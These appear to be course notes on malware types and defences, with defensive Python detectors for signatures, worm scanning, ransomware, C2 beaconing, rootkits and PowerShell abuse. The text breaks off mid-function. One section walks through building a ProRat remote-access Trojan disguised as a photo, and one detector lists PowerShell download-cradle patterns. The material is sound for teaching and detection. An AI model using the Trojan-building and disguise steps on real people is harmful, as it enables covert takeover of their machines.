Section 6: Malware

46: This section covers malware, defined as software designed to infiltrate and potentially damage
computer systems without the user's consent. It distinguishes threat vectors (the method used to
infiltrate) from attack vectors (the means by which access is gained and the system actually infected);
the analogy of a cupcake infiltrating a house illustrates the two. The focus is on analysing indicators
of malicious activity and on the main malware types covered in the following lessons: viruses, worms,
Trojans, ransomware, botnets and zombies, rootkits, backdoors and logic bombs, keyloggers, spyware
and bloatware, and fileless malware. The WannaCry ransomware outbreak of 2017 is cited as an
example. The section closes with malware attack techniques, the indicators of a successful malware
attack, and a quiz to reinforce the material.

47:

- Boot Sector Virus: Stored in the first sector of a hard disk (the master boot record), so it loads
before the operating system does; anti-virus running inside that operating system starts too late to
see the infection take hold.
- Macro Virus: Written in a document macro language (for example the VBA in Word, Excel or
PowerPoint files) and embedded in the document; it runs when the user opens the file and allows
macros to execute.
- Program Virus: Targets executables or application files, inserting malicious code that runs
whenever the program does.
- Multipartite Virus: Combines boot sector and program virus techniques, so cleaning one component
leaves the other to reinfect the machine.
- Encrypted Virus: Encrypts its body so that no fixed byte signature matches it; only a small
decryption routine remains in the clear.
- Polymorphic Virus: Changes its code, including the decryption routine, each time it replicates, so
every copy looks different to signature-based anti-virus even though it behaves the same.
- Metamorphic Virus: Rewrites itself entirely before infecting a new file rather than merely
re-encrypting; an advanced form of polymorphism.
- Stealth Virus: Uses techniques to hide its presence from anti-virus and the operating system, such
as encryption, modifying its payload, or intercepting the system calls that would otherwise reveal an
infected file's true size or contents.
- Armored Virus: Adds layers of protection (obfuscation, anti-debugging tricks) to confuse analysis
attempts.
- Hoax Virus: A form of social engineering rather than code: it tricks users into taking undesirable
actions, often by falsely claiming a virus infection.
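The encrypted and polymorphic entries above are easiest to see in code. The following Python model is an added example, not material from the course: the "virus body" is an inert text string that is never executed, the stub variants and signatures are made up for illustration, and the two scanners are deliberately simplified versions of a byte-signature scan and of the "X-ray" trick (try every single-byte XOR key, then scan the result) that anti-virus engines have used against simple encryptors.

```python
import random

# Constructed, inert stand-in for a viral body. It is plain text that is
# never executed; it exists only so the scanners below have something to match.
BODY = b"INERT SAMPLE BODY: appends itself to every .exe in the folder"
# A classic scanner keys on a distinctive substring of the known body.
BODY_SIGNATURE = b"appends itself to every .exe"

# An encrypted virus keeps a constant decryptor stub in the clear, so a second
# signature can target the stub even though the body bytes change every time.
FIXED_STUB = b"STUB:xor-loop-v1;"
STUB_SIGNATURE = b"xor-loop-v1"

# A polymorphic engine rewrites the stub from functionally equivalent variants
# and pads it with junk, so neither the body nor the stub signature is stable.
STUB_VARIANTS = [b"STUB:loop/a;", b"STUB:unrolled/b;", b"STUB:lea-xor/c;"]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encrypted_generation(key: int) -> bytes:
    """Model of one copy of an encrypted virus: [constant stub][key][XOR body]."""
    return FIXED_STUB + bytes([key]) + xor_bytes(BODY, key)


def polymorphic_generation(key: int, rng: random.Random) -> bytes:
    """Model of one copy of a polymorphic virus: the stub is rewritten and
    padded with random junk on every generation; the body is the same XOR body."""
    stub = rng.choice(STUB_VARIANTS)
    junk = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 9)))
    return stub + junk + bytes([key]) + xor_bytes(BODY, key)


def signature_scan(sample: bytes) -> set:
    """Plain byte-signature scan. Returns the names of the signatures that hit."""
    hits = set()
    if BODY_SIGNATURE in sample:
        hits.add("body")
    if STUB_SIGNATURE in sample:
        hits.add("stub")
    return hits


def xray_scan(sample: bytes) -> bool:
    """'X-ray' scan: ignore the stub and try every single-byte XOR key on the
    whole sample, looking for the body signature in the result. Catches both
    variants, because the body itself is identical underneath the encryption."""
    return any(BODY_SIGNATURE in xor_bytes(sample, k) for k in range(256))


def demo(seed: int = 7) -> dict:
    """Run both scanners over a plain, an encrypted and a polymorphic copy."""
    rng = random.Random(seed)
    encrypted = encrypted_generation(0x5A)
    polymorphic = polymorphic_generation(0xA7, rng)
    return {
        "plain": signature_scan(BODY),
        "encrypted": signature_scan(encrypted),
        "polymorphic": signature_scan(polymorphic),
        "xray_encrypted": xray_scan(encrypted),
        "xray_polymorphic": xray_scan(polymorphic),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:18} {result}")
```

The body signature fires only on the plain copy, the stub signature rescues detection of the encrypted copy, and the polymorphic copy defeats both; only the decrypt-then-scan approach finds all three, which is why modern engines rely on emulation and behaviour rather than static bytes alone.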

48:

In this lesson, we delve into computer worms, a type of malicious software similar to viruses but with
a distinct characteristic. Unlike viruses, which need a user action such as opening a file or clicking a
link, worms replicate without any user intervention: they exploit vulnerabilities in operating systems
and network-facing applications to spread across networks autonomously.

Worms pose a dual threat. They infect computing assets, and because they self-replicate they also
disrupt normal network traffic. Each infected host scans for and attacks further hosts, so a worm can
spread across a network in minutes, consuming network bandwidth and computing resources; the
constant scanning and replication can amount to a denial of service against the network and its
servers.

Historically, notable worms such as Nimda (2001) and Conficker (2008-2009) demonstrated this
widespread impact. Nimda became the most widespread worm on the internet within about 22 minutes
of its release, while Conficker infected millions of machines by exploiting a Windows Server service
vulnerability (MS08-067) for which a patch was already available; the victims were the hosts that had
not applied it.

The key takeaway is that worms self-replicate without user interaction, which distinguishes them from
viruses. They actively search for network connections, scanning for reachable hosts with known
vulnerabilities to infect, which is why prompt patching of network-facing services matters so much in
mitigating them.
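Worm-like propagation shows up in network telemetry as fan-out: one source contacting many distinct hosts on the same port in a short window. This Python detector is an added example, not course material; the flow records are constructed to contrast a scanning host with two legitimate ones, and the threshold and window are illustrative starting points rather than tuned values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

BASE = datetime(2024, 3, 1, 9, 0, 0)


def _at(seconds: int) -> str:
    return (BASE + timedelta(seconds=seconds)).isoformat()


# Constructed flow records: (timestamp, source, destination, destination port).
# They are not taken from any real capture.
FLOWS = (
    # Worm-like host: 30 distinct internal targets on TCP/445 within 30 seconds.
    [(_at(i), "10.0.0.5", f"10.0.1.{i + 1}", 445) for i in range(30)]
    # Normal workstation: repeated SMB to the same two file servers over an hour.
    + [(_at(i * 120), "10.0.0.8", "10.0.0.50" if i % 2 else "10.0.0.51", 445) for i in range(30)]
    # Normal browsing: many destinations on 443, but only one every five minutes.
    + [(_at(i * 300), "10.0.0.9", f"203.0.113.{i + 1}", 443) for i in range(12)]
)


def detect_scanners(flows, threshold: int = 20, window_seconds: int = 60) -> dict:
    """Flag sources that reached at least `threshold` distinct destinations on
    one port inside any window of `window_seconds`.
    Returns {source: (port, peak_distinct_destinations)}."""
    window = timedelta(seconds=window_seconds)
    per_key = defaultdict(list)
    for ts, src, dst, port in flows:
        per_key[(src, port)].append((datetime.fromisoformat(ts), dst))

    flagged = {}
    for (src, port), events in per_key.items():
        events.sort()
        recent = deque()  # (time, dst) pairs inside the sliding window
        for t, dst in events:
            recent.append((t, dst))
            while t - recent[0][0] > window:
                recent.popleft()
            distinct = len({d for _, d in recent})
            if distinct >= threshold and distinct > flagged.get(src, (port, 0))[1]:
                flagged[src] = (port, distinct)
    return flagged


if __name__ == "__main__":
    for src, (port, n) in detect_scanners(FLOWS).items():
        print(f"{src} touched {n} distinct hosts on tcp/{port} inside the window: worm-like fan-out")
```

The repeated connections to the two file servers never raise the distinct-destination count, and the slow browsing only trips the detector if the window is stretched to an hour, which is the tuning trade-off: a wider window catches slower scanners at the cost of more false positives.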

49:

In this lesson, we explore Trojans, a type of malware named after the Trojan horse of Greek legend.
During the long siege of Troy, the Greeks left a large wooden horse at the city gates as an apparent
offering. The seemingly harmless gift concealed Greek soldiers who, once inside the city walls,
opened the way for the attack that led to Troy's downfall. In cybersecurity, a Trojan works the same
way: malicious software disguised as a harmless or desirable program.

When executed, a Trojan performs the function it claims to, so the user suspects nothing, while also
carrying out malicious activity such as installing a backdoor or a virus. The lesson's example is a
popular game such as Tetris, distributed on floppy disks, with malicious code embedded in it. This
early form of Remote Access Trojan (RAT) let attackers establish a remote connection to, and take
control of, the victim's machine.

RATs, a subtype of Trojan, give the attacker remote control over the compromised system. The lesson
emphasises caution when downloading programs from the internet: obtain software from the vendor's
own site and scan it with an anti-virus or anti-malware solution before installing it. Regular patching
is also important, because it closes the system vulnerabilities that a Trojan's payload can exploit for
unauthorized access, data exfiltration and other malicious activity.

50:

Virus Creation:

Tool Used: The instructor uses "JPS Virus Maker 3.0", a point-and-click virus construction kit, to create the virus.

Example: A simple virus named "Crazy Mouse" is demonstrated. The user selects options such as the
name after installation ("service host") and the file name ("Explorer.exe").

Execution: The virus is created and saved in the downloads folder.

Remote Access Trojan (RAT) Creation:

Tool Used: The instructor uses a program called "ProRat" to create a RAT server.

Settings: General settings, including port number (5110), server password (12345), and a fake error
message ("You have been hacked") are configured.

Server Creation: The ProRat server is created, and additional options, such as binding it with a
picture file, are demonstrated.

File Binding: The server is bound with a picture of a desert, given an EXE extension, and an icon is
selected.

Execution: The server is created in the current directory, and the resulting file is renamed to
"Desert."

Victim's Perspective:

Trickery: The instructor emphasizes that social engineering or trickery is used to get the victim to
download and run the file.

Effect: For the virus, a demonstration is shown where the mouse cursor becomes uncontrollable,
causing disruption.
RAT Execution: The victim opens the file thinking it's a photo of the desert. An error message
appears, indicating they have been hacked.

RAT Control:

Access: The instructor shows the ProRat interface on the attacking machine.

Information Gathering: System information, user details, date and time, and the last 25 visited
websites are displayed.

Remote Actions: The attacker can take screenshots, view the webcam (if available), and even send
messages to the victim's screen.

Manipulation: Examples include hiding desktop icons, making the mouse go crazy, flipping the screen
upside down, and sending messages to the victim's desktop.

51:

Key Points:

Definition of Ransomware:

Ransomware is the digital equivalent of kidnapping but focuses on digital data and information
assets.

It encrypts computer systems or data and demands payment for a decryption key.

Scale of Ransom Amounts:

Ransom amounts can vary, with some demands being low for individual users and multi-million
dollar demands for large organizations.

The Colonial Pipeline attack of 2021 is cited as an example where a fuel company paid $4.4 million in
Bitcoin to DarkSide attackers.

Real-world Consequences:

The Colonial Pipeline attack led to a shutdown, causing fuel shortages, panic buying, and increased
gas prices.

The University Hospital in Düsseldorf suffered a ransomware attack (2020) that forced it to turn away
emergency patients; the death of one patient who had to be redirected to a more distant hospital was
attributed to the resulting delay in treatment.

Security Best Practices Against Ransomware:

Regular Backups:

Conduct regular backups of important data, files, and systems.

Keep at least one backup copy offline or otherwise unreachable from the network (removable media
kept disconnected, or cloud storage with immutable or versioned objects), so that ransomware which
reaches the network cannot encrypt the backups along with the primary data.

Software Updates:

Install regular software updates, especially for the operating system and antivirus programs.
Patch vulnerabilities to prevent exploitation by attackers.

Security Awareness Training:

Provide security awareness training to end users.

Users should be cautious of unsolicited emails, especially those with attachments or links.

Multi-Factor Authentication (MFA):

Implement multi-factor authentication for an extra layer of security.

Makes it more challenging for attackers to breach user accounts and install ransomware.

Response to Ransomware Attacks:

Never Pay the Ransom:

Paying the ransom does not guarantee data recovery and supports criminal behavior.

It can make an organization a target for future attacks.

Isolate Infected Systems:

Immediately disconnect the infected machine from the network to prevent the spread of
ransomware.

Notify Authorities:

Ransomware attacks are considered criminal events and should be reported to the authorities.

Organizations should follow their incident response processes regarding reporting.

Restore from Backups:

Restore data and systems from known good backups.

Ensure that the ransomware is completely removed before restoring critical data, to prevent re-encryption.
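The "resource inaccessibility" symptom described here can be checked for programmatically. The Python below is an added example, not from the course: it builds three constructed directories in a temporary folder (plain documents, a legitimately high-entropy photo folder, and the aftermath of an attack) and scores each on three indicators taken together: unexplained high-entropy files, one new extension applied to many of them, and ransom-note file names. The thresholds (7.5 bits per byte, half of the files, five files sharing an extension) are illustrative assumptions.

```python
import math
import random
import tempfile
from collections import Counter
from pathlib import Path

HIGH_ENTROPY = 7.5  # bits per byte; encrypted or compressed data sits near 8.0
# Formats that are legitimately high-entropy and must not count as "encrypted".
COMPRESSED_EXTENSIONS = {".zip", ".7z", ".gz", ".jpg", ".jpeg", ".png", ".mp4", ".pdf"}
RANSOM_NOTE_HINTS = ("readme", "decrypt", "restore", "recover", "how_to")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def assess_directory(root: Path) -> dict:
    """Combine three indicators: share of unexplained high-entropy files, a
    single new extension applied to many of them, and ransom-note file names."""
    files = [p for p in root.rglob("*") if p.is_file()]
    unexplained = [
        p for p in files
        if p.suffix.lower() not in COMPRESSED_EXTENSIONS
        and shannon_entropy(p.read_bytes()) >= HIGH_ENTROPY
    ]
    notes = [p.name for p in files if any(h in p.name.lower() for h in RANSOM_NOTE_HINTS)]
    ext, ext_count = (Counter(p.suffix.lower() for p in unexplained).most_common(1) or [("", 0)])[0]
    ratio = len(unexplained) / len(files) if files else 0.0

    if ratio >= 0.5 and ext_count >= 5 and notes:
        verdict = "ransomware-like"
    elif ratio >= 0.5 or notes:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"files": len(files), "high_entropy": len(unexplained), "dominant_ext": ext,
            "ransom_notes": notes, "verdict": verdict}


def build_fixture(root: Path, kind: str) -> None:
    """Constructed test data, written only inside a temporary directory.
    kind: 'docs' (plain reports), 'media' (random bytes under .jpg, i.e. a
    legitimately high-entropy folder), or 'encrypted' (the aftermath of an
    attack: every report replaced by random bytes under .locked plus a note)."""
    rng = random.Random(1)
    report = ("Quarterly report: revenue, costs, headcount, forecast. " * 80).encode()
    for i in range(10):
        if kind == "docs":
            (root / f"report_{i}.docx").write_bytes(report)
        elif kind == "media":
            (root / f"photo_{i}.jpg").write_bytes(rng.randbytes(4096))
        else:
            (root / f"report_{i}.docx.locked").write_bytes(rng.randbytes(4096))
    if kind == "encrypted":
        (root / "README_DECRYPT_FILES.txt").write_text("Your files are encrypted. Contact us to recover them.")


def run_scenarios() -> dict:
    """Return {scenario: verdict} for the three constructed directories."""
    results = {}
    for kind in ("docs", "media", "encrypted"):
        with tempfile.TemporaryDirectory() as tmp:
            build_fixture(Path(tmp), kind)
            results[kind] = assess_directory(Path(tmp))["verdict"]
    return results


if __name__ == "__main__":
    print(run_scenarios())
```

Entropy alone would flag the photo folder, which is why the extension allow-list and the ransom-note check are combined with it. A check like this runs after the fact; it is a triage aid for the isolation step above, not a substitute for the backups that make recovery possible.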

52:

1. Botnets:

Definition: A botnet is a network of compromised computers or devices controlled remotely by
malicious actors for cyber attacks or other malicious activities.

Formation: Botnets are created by infecting systems with malware, turning them into zombies and
adding them to the botnet.

Control Mechanism: An attacker controls the botnet through a command and control node (C2
node).

Scale: Botnets can consist of hundreds, thousands, or even millions of compromised systems.

2. Zombies:

Definition: A zombie is a compromised computer or device that is part of a botnet and is used to
perform tasks using remote commands from the attacker.
Task Execution: Zombies carry out tasks assigned by the attacker without the user's knowledge.

Control Hierarchy: Zombies are under the control of a master node, and commands are transmitted
through the C2 node.

3. Botnet Activities:

DDoS Attacks: Distributed Denial of Service attacks involve multiple zombies targeting a victim
simultaneously, overwhelming systems and causing a denial of service.

Illegal Content Storage: Some attackers use botnets to store illegal content across numerous
compromised devices.

Spam and Phishing: Botnets are utilized to send spam emails and phishing campaigns to a wide range
of targets globally.

Crypto Mining: Attackers may command zombies to perform crypto mining, using their processing
power to mine cryptocurrency.

Breaking Encryption: The botnet's combined processing power can be used for distributed cracking,
such as brute-forcing password hashes or weak encryption keys.

4. Crypto Mining and Botnets:

Economic Incentive: Attackers leverage the combined processing power of botnets for crypto mining,
gaining monetary benefits.

Avoiding Detection: To avoid detection, attackers typically use a portion (20-25%) of each zombie's
processing power, minimizing the impact on the user's machine.

5. Prevention and Awareness:

Detection Challenges: Attackers often avoid using all available processing power to prevent
immediate detection.

Security Measures: Users and organizations should implement security measures to prevent
machines from becoming part of a botnet.

Best Practices: Regular updates, security awareness training, and multi-factor authentication help
protect against malware and botnet infections.
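Zombies reveal themselves by how regularly they contact their C2 node. The Python below is an added example, not course material; the connection log is constructed, with a 300-second check-in plus a few seconds of jitter next to a human browsing pattern, and the minimum event count and coefficient-of-variation threshold are assumptions to tune against real traffic (real botnets add more jitter, and a long-period beacon needs a correspondingly longer observation window).

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

BASE = datetime(2024, 3, 1, 0, 0, 0)


def _conn(seconds: int, src: str, dst: str) -> tuple:
    return (BASE + timedelta(seconds=seconds)).isoformat(), src, dst


# Constructed outbound-connection log: (timestamp, source, destination).
CONNECTIONS = (
    # A zombie checking in with its C2 node every 300 s with a few seconds of jitter.
    [_conn(300 * i + j, "10.0.0.23", "198.51.100.7")
     for i, j in enumerate([0, 2, -1, 3, 0, -2, 1, 2, -3, 1, 0, 2])]
    # The same workstation reading a news site at irregular, human intervals.
    + [_conn(s, "10.0.0.23", "203.0.113.10")
       for s in [5, 40, 41, 95, 400, 410, 2000, 2100, 2101, 3500, 3520, 4000]]
    # Another host contacting an update server only twice in a day.
    + [_conn(s, "10.0.0.31", "192.0.2.50") for s in [100, 86500]]
)


def detect_beacons(connections, min_events: int = 8, max_cv: float = 0.1) -> dict:
    """Flag (source, destination) pairs whose inter-connection gaps are too
    regular to be human: at least `min_events` connections and a coefficient
    of variation (std dev / mean) of the gaps no greater than `max_cv`."""
    pairs = defaultdict(list)
    for ts, src, dst in connections:
        pairs[(src, dst)].append(datetime.fromisoformat(ts))

    beacons = {}
    for pair, times in pairs.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            beacons[pair] = {"events": len(times), "period_s": round(mean), "jitter_cv": round(cv, 3)}
    return beacons


if __name__ == "__main__":
    for (src, dst), info in detect_beacons(CONNECTIONS).items():
        print(f"{src} -> {dst}: {info['events']} connections every ~{info['period_s']} s "
              f"(cv {info['jitter_cv']}): likely C2 beacon")
```

The same workstation appears in both the flagged pair and a clean one, which is the point: the destination-level regularity, not the host, is the indicator. The two-connection pair is skipped rather than scored, since a coefficient of variation over one gap is meaningless.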

53:

1. Rootkits Overview:

Definition: Rootkits are a type of software designed to gain administrative-level control over a
computer system without being detected.

Objective: Installing a rootkit gives the attacker root or administrative-level permissions, the highest
level of control over the targeted system.

2. Administrative Permissions:

Windows vs. Unix/Linux/macOS: On Windows the highest level of permission belongs to the
administrator account (and the SYSTEM account that services run as); on Unix, Linux and macOS it is
the root account.
Power of Administrative Access: Administrative or root access grants the ability to install and delete
programs, manage ports, and perform various actions on the system.

3. Operating System Rings:

Security Rings: Computer systems have different rings of permissions, with user permissions in ring
three (outermost) and kernel mode (ring zero) having the highest permissions.

Kernel Mode: Kernel mode allows control over critical system components like device drivers, sound
cards, and video displays.

4. Rootkit Operations:

Targeted Rings: Rootkits aim to run with the highest privileges available. User-mode rootkits run in
ring three alongside the applications they hook; kernel-mode rootkits load as drivers or kernel
modules and run in ring zero, with the same power as the operating system itself. (Rings one and two
exist in the x86 design, but mainstream operating systems do not use them.)

Detection Avoidance: A kernel-mode rootkit sits beneath the operating system's own view of files,
processes and network connections, so it can filter what the operating system reports and hide from
security tools running above it.

Challenges for Security Solutions: Rootkits are challenging to detect due to their deep integration
into the operating system.

5. DLL Injection:

Definition: DLL injection is a technique to run arbitrary code within another process's address space
by forcing it to load a dynamic-link library (DLL).

DLLs in Windows: DLLs, collections of code and data, are used by multiple programs simultaneously,
often provided within the Windows OS.

Malicious Code Insertion: Rootkits use DLL injection to insert malicious code into a running process,
exploiting the loading of DLLs at runtime.

6. Shim Technique:

Definition: A shim is a piece of software code placed between two components, intercepting and
redirecting their calls.

Rootkit Application: Rootkits use the shim technique to intercept communications between the
operating system and dynamic-link libraries, redirecting calls through embedded malicious code.

7. Detection and Removal:

Detection Challenges: Rootkits are challenging to detect because they operate deep within the
operating system, often rendering traditional antivirus solutions ineffective.

Effective Detection Method: The most effective way to detect a rootkit is to scan the system from
outside the compromised operating system: boot from a trusted live Linux distribution (or other
known-good media) and examine the disk from there, so the rootkit is not running and cannot hide
its files. Compare the system's binaries and kernel modules against known-good hashes rather than
trusting anything the infected operating system reports about itself.
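The offline scan recommended here amounts to hashing the installed system from trusted media and diffing the result against a trusted baseline. The Python below is an added example, not course material: it runs entirely in a temporary directory with labelled text files standing in for binaries, and the tampering it applies (a trojanised ps, a dropped module, a deleted tool) is constructed. In a real scan the baseline would come from vendor package hashes or a clean image, and the hashing would run from the live-booted system, never from the suspect one.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict:
    """Map each file's path (relative to root) to the SHA-256 of its contents."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Diff a trusted baseline against what the offline scan sees now."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "missing": sorted(k for k in baseline if k not in current),
    }


def simulate_offline_scan() -> dict:
    """Constructed scenario inside a temporary directory: take a baseline of a
    miniature system tree, apply rootkit-style changes, and diff. The file
    contents are labelled text, not real binaries."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "lib" / "modules").mkdir(parents=True)
        (root / "bin" / "ls").write_bytes(b"constructed: original ls")
        (root / "bin" / "ps").write_bytes(b"constructed: original ps")
        (root / "lib" / "libc.so").write_bytes(b"constructed: original libc")
        baseline = hash_tree(root)  # in practice: vendor package hashes or a clean image

        # Rootkit-style tampering: a trojanised ps that filters out hidden
        # processes, a dropped kernel module, and a removed tool.
        (root / "bin" / "ps").write_bytes(b"constructed: ps that hides selected PIDs")
        (root / "lib" / "modules" / "unknown.ko").write_bytes(b"constructed: dropped module")
        (root / "bin" / "ls").unlink()
        return compare_manifests(baseline, hash_tree(root))


if __name__ == "__main__":
    for kind, paths in simulate_offline_scan().items():
        print(f"{kind:9} {paths}")
```

The diff is only as trustworthy as the two inputs: the baseline must not have been taken on an already-infected machine, and the current hashes must be read by a kernel the rootkit does not control, which is exactly what booting from separate media provides.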

54:

1. Backdoors:

Definition: Originally placed in computer programs to bypass normal security and authentication
functions.
Historical Context: Common in the 1980s and 1990s for maintenance and repairs without going
through usual security layers.

Modern View: Considered a breach of secure coding practices; most software today avoids
backdoors.

2. Remote Access Trojans (RATs):

Nature: Acts like a backdoor; placed by threat actors to maintain persistent access.

Installation: Users tricked into clicking phishing links, leading to malware installation.

Functionality: Creates a callback (reverse) connection from the victim out to the attacker. Because
the connection originates inside the network, it passes through firewalls that only filter inbound
traffic, and the attacker can then reach the system while bypassing its default security measures.

3. Easter Eggs:

Definition: Insecure coding practice where programmers insert hidden features, jokes, or gags into
software.

Example: Google's "do a barrel roll" Easter Egg in the search application.

Security Implications: May introduce vulnerabilities due to additional code; not subjected to rigorous
security testing.

4. Logic Bombs:

Definition: Malicious code inserted into a program; executes when specific conditions are met.

Purpose: Typically more malicious than Easter Eggs; has harmful intent.

Example: Dennis Nedry's logic bomb in "Jurassic Park" designed to shut down power for theft.

5. Security Best Practices:

Backdoors: Should not be included in modern applications; considered a breach of secure coding
standards.

Easter Eggs: While generally harmless, may introduce vulnerabilities; avoid in critical applications.

Logic Bombs: Malicious and harmful; strict security measures should be in place to prevent them.

6. Secure Coding Standards:

Importance: Regularly scan custom-developed applications to ensure compliance with secure coding
standards.

Avoidance: Backdoors, Easter Eggs, and logic bombs are discouraged in modern applications for
security reasons.

55:

1. Keyloggers:

Definition: Software or hardware that records every keystroke on a computer or mobile device.

Origin: Originally developed for troubleshooting by system administrators.

Evolution: Weaponized by cybercriminals to steal sensitive information from victims.


2. Types of Keyloggers:

Software-Based:

Malicious programs installed on a victim's computer.

Often bundled with other software or delivered through social engineering attacks.

Can evade antivirus detection, especially with sophisticated evasion techniques.

Operate silently in the background and transmit captured data to a remote server.

Hardware-Based:

Physical devices requiring connection to a computer.

Resemble USB thumb drives or are embedded in keyboard cables.

Largely invisible to host-based software, since they sit between the keyboard and the computer
rather than running on it; physical inspection is the primary detection method.

Effective in targeted attacks but harder to deploy on a large scale.

3. Risks Associated:

Personal Risks:

Unauthorized access to usernames, passwords, credit card numbers.

Potential for identity theft, financial fraud, and unauthorized transactions.

Business Risks:

Employees unwittingly compromising login credentials and sensitive data.

Financial losses, damage to the organization's reputation, legal repercussions.

Compromised proprietary data, confidential emails, or strategic plans.

4. Protective Measures:

Regular Updates and Patches:

Ensure systems and software are updated to prevent exploitation of known vulnerabilities.

Antivirus and Anti-Malware Solutions:

Invest in quality security software for detection and quarantine of keyloggers.

Conduct regular scans to detect any installed keyloggers.

Phishing Awareness Training:

Train end-users to be cautious about downloading attachments or clicking links from unknown or
untrusted sources.

Keyloggers are often distributed through phishing emails.

Multifactor Authentication (MFA):

Implement MFA across the enterprise network to add an extra layer of verification.
Even if passwords are captured, additional steps are required for access.

Keystroke Encryption:

Use security software that implements keystroke encryption.

Scrambles typed information before sending it over the system, making it unusable to threat actors.

Physical Checks:

Regularly inspect system hardware for unfamiliar devices, especially in sensitive environments.

Identify and remove any potential hardware-based keyloggers.

56:

1. Spyware:

Definition: Malicious software designed to gather and send information about a user or organization
without their knowledge.

Data Collection: Ranges from browsing habits to sensitive data like passwords and credit card
numbers.

Installation Methods:

Bundled with other software.

Installed through malicious websites.

Installed via deceptive pop-up advertisements.

Effects:

Invasion of privacy.

Slows down system performance as it continually monitors and transmits data.

Protection Measures:

Use reputable antivirus and anti-spyware tools regularly updated for threat detection and removal.

Download software only from trusted sources.

Read and understand End User License Agreements (EULAs), which may disclose bundled data collection.

Keep the operating system and software up to date to patch vulnerabilities.

2. Bloatware:

Definition: Software pre-installed on devices that users did not specifically request or need.

Origin: Often part of promotional partnership deals between manufacturers/vendors and software
companies.

Examples: Trial versions of applications, unnecessary toolbars, or promotional applications.

Effects:

Takes up storage space.

Uses system resources, affecting performance.

Introduces potential security vulnerabilities.

Mitigation:

Manually remove bloatware through system settings.

Use bloatware removal tools for comprehensive cleanup.

Perform a clean operating system installation when setting up a new device.

3. Removal of Bloatware:

Manual Removal:

On Windows, use the Programs and Features section in the Control Panel.

On smartphones or tablets, navigate to the app section in settings.

Bloatware Removal Tools:

Third-party tools available for more comprehensive removal.

Clean Operating System Installation:

Preferred by some as it ensures a device starts with only necessary software.

4. Best Practices:

Spyware Protection:

Regularly update and patch systems.

Use reputable security tools.

Exercise caution when downloading software.

Read and understand EULAs.

Bloatware Management:

Regularly remove unused software to minimize attack surfaces.

Consider clean operating system installations on new devices.

57:

1. Evolution to Fileless Malware:

Historical Methods:

Modifying executable files or adding malicious macros to documents.

Infecting system memory, leveraging remote procedure calls for spreading.

Modern Approach:

Fileless malware techniques aim to bypass signature-based security systems.

Executes malicious code directly as a script or a small piece of shellcode.

Creates a process in system memory without relying on the local file system.

Leaves fewer traces, making detection more challenging.

2. Fileless Malware Workflow:

Two-Stage Deployment Model:

Stage One (Dropper):

Lightweight shellcode or script executed on user interaction (for example a macro or a malicious
link).

Initiates the installation of the remaining malware components.

Stage Two (Downloader):

Downloads and installs a remote access Trojan (RAT).

Enables command and control over the victimized system.

Objective:

Establish access to the system.

Spread influence across the network.

3. Attacker Objectives:

Network Influence:

Compromise high-value targets (servers, domain controllers).

Expand permissions and footprint across the network.

Action on Objectives:

Execute primary objectives (data exfiltration, ransomware).

Concealment:

Hide tracks, erase log files, and eliminate evidence of malicious activities.

4. Malware Delivery Techniques:

Various Methods:

Code injection, masquerading, DLL injection, DLL sideloading, process hollowing.

Anti-forensic strategies: encryption, compression, obfuscation.

Code Injection Example:

Running malicious code under the identity of a legitimate process (its name, PID and trust), so it blends in with normal activity.

5. Living Off the Land:

Strategy:

Exploit standard system tools for malicious activities.

Utilize default tools installed on the operating system.


Example: PowerShell:

Abused for a wide range of malicious activity, from downloading payloads to executing them entirely
in memory.

Detection is hard because the activity consists of legitimate PowerShell commands run by a signed
Microsoft binary; telling it apart from administration depends on context such as encoded or
hidden-window command lines, download cradles, and the parent process that launched it. Enabling
PowerShell Script Block Logging (Event ID 4104) records the de-obfuscated script content and is the
key data source for detecting this.

Awareness:

Cybersecurity professionals must be aware of such techniques.

Importance of staying updated on emerging threats.
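Living-off-the-land PowerShell is caught by looking at how it is invoked rather than which binary ran. The Python below is an added example, not course material: it scores constructed process-creation command lines (as they would appear in the CommandLine field of Windows Event ID 4688 or Sysmon Event ID 1), decodes an -EncodedCommand argument the way PowerShell expects it (base64 over UTF-16LE), and scans the decoded payload separately from the wrapper. The regexes and severity bands are illustrative assumptions, and 203.0.113.5 is a documentation address.

```python
import base64
import re

ENCODED_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Wrapper and payload traits that, together, distinguish a download cradle
# from routine administration. Each is weak alone; the count is what matters.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no?p(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}


def encode_powershell(command: str) -> str:
    """Produce the -EncodedCommand argument the way PowerShell expects it:
    base64 over the UTF-16LE bytes of the script text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str):
    """Reverse of encode_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
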